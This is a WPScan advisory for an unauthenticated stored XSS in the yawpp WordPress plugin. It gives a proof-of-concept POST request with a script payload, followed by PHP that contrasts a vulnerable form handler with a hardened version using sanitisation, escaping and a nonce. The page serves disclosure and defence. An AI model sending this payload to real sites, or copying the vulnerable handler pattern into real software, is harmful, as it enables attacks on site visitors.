YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)


Proof of Concept

POST /wordpress-4.3/?p=4 HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress-4.3/?p=4
Cookie: wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1449056570
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

field1=<script>alert(/XSS-Field1/)</script>&field2=test2%40gmail.com&id=1&submit_yawpp=Valider
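A stored XSS of the kind reported above arises when a public form handler persists a POST parameter without sanitising it and later echoes it into a page without escaping, so the payload runs in every visitor's browser. The PHP below is an added, hypothetical illustration of that bug class beside its hardened form; it is not the yawpp plugin's own source. The only material taken from this page is the PoC request body and its parameter names (field1, field2, id, submit_yawpp). The WordPress functions sanitize_text_field(), esc_html() and wp_verify_nonce() are real; the stand-in definitions exist only so the file runs outside WordPress, and the nonce action name yawpp_submit and the stand-in secret are assumptions.

```php
<?php
/*
 * Added illustration of the stored XSS class in this advisory: a front-end
 * form handler that stores a POST field and later echoes it into the page.
 * Hypothetical code, not the yawpp plugin's source; only the parameter
 * names (field1, field2, id, submit_yawpp) come from the PoC request.
 */

// Stand-ins so the file runs outside WordPress. Inside WordPress the real
// sanitize_text_field(), esc_html() and wp_verify_nonce() are used instead.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}
if (!function_exists('esc_html')) {
    function esc_html($str) {
        return htmlspecialchars((string) $str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('wp_verify_nonce')) {
    // Stand-in with a fixed secret (assumption); WordPress derives nonces
    // from the user, session token and action name.
    function wp_verify_nonce($nonce, $action) {
        $expected = hash_hmac('sha256', $action, 'stand-in-secret');
        return is_string($nonce) && hash_equals($expected, $nonce);
    }
}

// Vulnerable pattern: raw POST data is persisted and echoed back as-is.
function vulnerable_submit(array $post, array &$store) {
    if (!isset($post['submit_yawpp'])) { return null; }
    $store[] = array('field1' => $post['field1'], 'field2' => $post['field2']);
    return $store;
}
function vulnerable_render(array $store) {
    $html = '';
    foreach ($store as $row) {
        // Any <script> stored in field1 is emitted verbatim to every visitor.
        $html .= '<li>' . $row['field1'] . ' (' . $row['field2'] . ')</li>';
    }
    return $html;
}

// Hardened pattern: validate and sanitise on input, escape on output, and
// require a nonce so the form only accepts submissions it issued (CSRF guard;
// the XSS itself is closed by the sanitise/escape pair).
function hardened_submit(array $post, array &$store) {
    if (!isset($post['submit_yawpp'])) { return null; }
    $nonce = isset($post['_wpnonce']) ? $post['_wpnonce'] : '';
    if (!wp_verify_nonce($nonce, 'yawpp_submit')) {
        return false; // missing or invalid nonce: reject the submission
    }
    $id    = filter_var(isset($post['id']) ? $post['id'] : '', FILTER_VALIDATE_INT);
    $email = filter_var(isset($post['field2']) ? $post['field2'] : '', FILTER_VALIDATE_EMAIL);
    if ($id === false || $email === false) {
        return false; // malformed id or e-mail: reject instead of storing
    }
    $store[] = array(
        'id'     => $id,
        'field1' => sanitize_text_field(isset($post['field1']) ? $post['field1'] : ''),
        'field2' => $email,
    );
    return $store;
}
function hardened_render(array $store) {
    $html = '';
    foreach ($store as $row) {
        // esc_html() turns < > " ' & into entities, so stored text stays text.
        $html .= '<li>' . esc_html($row['field1']) . ' (' . esc_html($row['field2']) . ')</li>';
    }
    return $html;
}

// Demonstration using the body of the PoC request from this advisory.
parse_str('field1=<script>alert(/XSS-Field1/)</script>&field2=test2%40gmail.com&id=1&submit_yawpp=Valider', $poc);

$vuln = array();
vulnerable_submit($poc, $vuln);
echo "vulnerable: " . vulnerable_render($vuln) . "\n";

$safe = array();
$rejected = hardened_submit($poc, $safe);      // false: the PoC carries no nonce
$poc['_wpnonce'] = hash_hmac('sha256', 'yawpp_submit', 'stand-in-secret');
hardened_submit($poc, $safe);                  // accepted once a valid nonce is present
echo "hardened:   " . hardened_render($safe) . "\n";
```

Run with `php example.php`. The vulnerable branch emits the script tag unchanged; the hardened branch first refuses the nonce-less PoC request outright and, once a valid nonce is supplied, stores the field with tags stripped and renders it entity-encoded. Inside a real plugin the form would emit the nonce with wp_nonce_field('yawpp_submit') and the stand-in definitions would never be reached.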

Affects

Plugin: yawpp

References

URL: https://plugins.svn.wordpress.org/yawpp/tags/1.2.2/

Classification

Type: XSS
OWASP Top 10: A3: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Submitter: ethicalhack3r
Submitter Website: https://dewhurstsecurity.com/
Submitter Twitter: ethicalhack3r
Views: 186
Verified: No
WPVDB ID: 8351

Timeline

Publicly Published: 2015-12-09 (about 1 year ago)
Added: 2015-12-09 (about 1 year ago)
Last Updated: 2015-12-09 (about 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.